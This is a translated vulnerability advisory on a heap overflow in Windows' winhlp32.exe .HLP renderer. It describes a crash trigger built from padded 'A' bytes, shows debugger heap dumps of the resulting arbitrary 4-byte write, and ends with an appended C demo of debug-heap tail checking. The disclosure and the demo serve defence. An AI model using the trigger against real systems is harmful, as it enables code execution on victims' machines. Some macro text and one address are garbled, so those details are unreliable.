Graph processing heap overflow vulnerability in Microsoft Windows

Affected Systems:
  Microsoft Windows XP SP2
  Microsoft Windows XP SP1
  Microsoft Windows Server 2003 SP1
  Microsoft Windows Server 2003
  Microsoft Windows NT Server 4.0
  Microsoft Windows 2000 SP4
  Microsoft Windows 2000 SP3
  Microsoft Windows 2000 SP2
  Microsoft Windows 2000 SP1

Description:
--------------------------------------------------------------------------------
BugTraq ID: 17325

Microsoft Windows is a very popular operating system released by Microsoft.

The .HLP file rendering engine of winhlp32.exe has a heap overflow vulnerability. Attackers can embed HTML pages in a .HLP file to trigger this vulnerability, overwrite heap memory blocks, and execute arbitrary commands.

Test method:
--------------------------------------------------------------------------------
Alert: the following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!

Take acmsetup.HLP as an example. The original file contains (snip):

  : CW ('main'): FH () : CBB ('btn _ topics ', 'Ns (): Ji ('> Mai N', 'helptopicsbu Tton '): FH (): CS () : FH (): FD () '): SPC (1, 16777215): FH ().

Attackers can inject malicious input to trigger this vulnerability (snip): the same macro text is followed by a run of "A" bytes (AAAAAAAA..., plus 10,000 more).

After winhlp32.exe opens the .HLP file, the heap status is as follows:

  Heap[winhlp32.exe]: heap block at 0009b940 modified at 0009b9a2 past requested size of 5a
  0:000> dd 0009b940
  0009b940  0005000f 001e0700 4f26001f 41697470
  0009b950  41414141 abababab 41ababab feeefeee
  0009b960  4100feee 41414141 00040000 41000005
  0009b970  554d001b 41002928 41414141 feababab
  0009b980  4100feee 00000000 41060000 41414141
  0009b990  6f42001f 416d6b6f 65446b72 416e6966
  0009b9a0  41414141 abababab 41ababab feeefeee
  0009b9b0  4100feee 00004141 000f0006 feee0400

  Heap[winhlp32.exe]: Invalid Address specified to RtlFreeHeap( 00090000, 0009b948 )
  (728.2f8): Break instruction exception - code 80000003 (first chance)
  eax=0009b940 ebx=0009b940 ecx=77f75c17 edx=0007ecba esi=00090000 edi=0009b940
  eip=77f75a58 esp=0007eec4 ebp=0007eed8 iopl=0         nv up ei pl nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
  0:000> dd 0009b948
  0009b948  4f26001f 41697470 41414141 abababab
  0009b958  41ababab feeefeee 4100feee 41414141
  0009b968  00040000 41000005 554d001b 41002928
  0009b978  41414141 feababab 4100feee 00000000
  0009b988  41060000 41414141 6f42001f 416d6b6f
  0009b998  65446b72 416e6966 41414141 abababab
  0009b9a8  41ababab feeefeee 4100feee 00004141
  0009b9b8  000f0006 00230400 000901a8 000901a8

  Heap[winhlp32.exe]: heap block at 0009be50 modified at 0009bf54 past requested size of fc
  0:000> dd 0009be50
  0009be50  00180023 001c0700 02390006 007a0000
  0009be60  00000000 02b30000 00280000 000e0000
  0009be70  000d0000 00010000 00000004 00000000
  0009be80  00000000 005a0000 00100000 00000000
  0009be90  00000000 00000000 80000080 80000000
  0009bea0  00800080 00800000 80800080 41410000
  0009beb0  41414141 41414141 41414141 41414141
  0009bec0  41414141 41414141 41414141 41414141

It can be seen that the tail of the previous block has been overwritten at 0009be54, and everything that follows is attacker-controlled:

  0:000> dd 0009bf54
  0009bf54  41414141 41414141 41414141 41414141
  0009bf64  41414141 41414141 41414141 41414141
  0009bf74  41414141 41414141 41414141 41414141
  0009bf84  41414141 41414141 41414141 41414141
  0009bf94  41414141 41414141 41414141 41414141
  0009bfa4  41414141 41414141 41414141 41414141
  0009bfb4  41414141 41414141 41414141 41414141
  0009bfc4  41414141 41414141 41414141 41414141

Because the two pointers in the heap management structure can be directly controlled, 4 bytes of arbitrary memory can be overwritten:

  EAX 41414141
  ECX 41414141
  EDX 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa..."
  EBX 00090000
  ESP 0007f90c
  EBP 0007fb30
  ESI 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa..."
  EDI 00000068
  EIP 77f581bd ntdll.77f581bd

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Microsoft
---------
Currently, the vendor has not released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://www.microsoft.com/technet/security/
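The two debug-heap reports quoted in the test method above ("heap block at X modified at Y past requested size of Z") come from a tail check: the heap fills the bytes after the requested size with a known pattern and verifies it when the block is freed, and in both reports Y = X + 8 + Z, the first byte after the user data (0009b940 + 8 + 5a = 0009b9a2; 0009be50 + 8 + fc = 0009bf54). The C program below is an added illustration, not code from the advisory or from Windows: it implements that check with a constructed allocator whose header layout, fill byte and function names are assumptions, and runs it against the two requested sizes seen in the dump (0x5a and 0xfc).

```c
/* Added example (not the advisory's code): a minimal tail-check allocator that
 * mirrors the debug-heap check behind "heap block at X modified at Y past
 * requested size of Z". Header layout, fill byte and names are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define TAIL_FILL 0xAB   /* pattern placed after user data (cf. abababab in the dump) */
#define TAIL_LEN  8      /* guard bytes checked on free */
struct chk_hdr { uint32_t req; uint32_t pad; };  /* 8-byte header, like an x86 heap entry */

/* Allocate req bytes, record the size and fill the guard bytes after the data. */
static void *chk_alloc(uint32_t req) {
    struct chk_hdr *h = malloc(sizeof *h + req + TAIL_LEN);
    if (!h) return NULL;
    h->req = req;
    memset((unsigned char *)(h + 1) + req, TAIL_FILL, TAIL_LEN);
    return h + 1;
}

/* Offset from the user pointer of the first guard byte != TAIL_FILL; -1 if intact. */
static long chk_tail(const void *p) {
    const struct chk_hdr *h = (const struct chk_hdr *)p - 1;
    const unsigned char *tail = (const unsigned char *)p + h->req;
    for (unsigned i = 0; i < TAIL_LEN; i++)
        if (tail[i] != TAIL_FILL) return (long)h->req + i;
    return -1;
}

/* Free with the tail check; prints the same report shape as the debug heap. */
static int chk_free(void *p) {
    struct chk_hdr *h = (struct chk_hdr *)p - 1;
    long off = chk_tail(p);
    if (off >= 0)
        fprintf(stderr, "heap block at %p modified at %p past requested size of %x\n",
                (void *)h, (void *)((unsigned char *)p + off), (unsigned)h->req);
    free(h);
    return off < 0;   /* 1 if the block was intact */
}

/* The bug class: `written` bytes of 'A' copied into a `req`-byte block with no length
 * check. Clamped to the guard area so the demo never corrupts the real heap. */
static long simulate_copy(uint32_t req, uint32_t written) {
    if (written > req + TAIL_LEN) written = req + TAIL_LEN;
    unsigned char *dst = chk_alloc(req);
    if (!dst) return -2;
    memset(dst, 'A', written);
    long off = chk_tail(dst);   /* 0x5a for (0x5a, 0x5b): first byte past the data */
    chk_free(dst);
    return off;                 /* -1 when nothing past req was touched */
}
```

A real debug heap additionally checks the 8-byte header of the following block, which is why the second dump reports the modification at the exact block boundary 0009bf54.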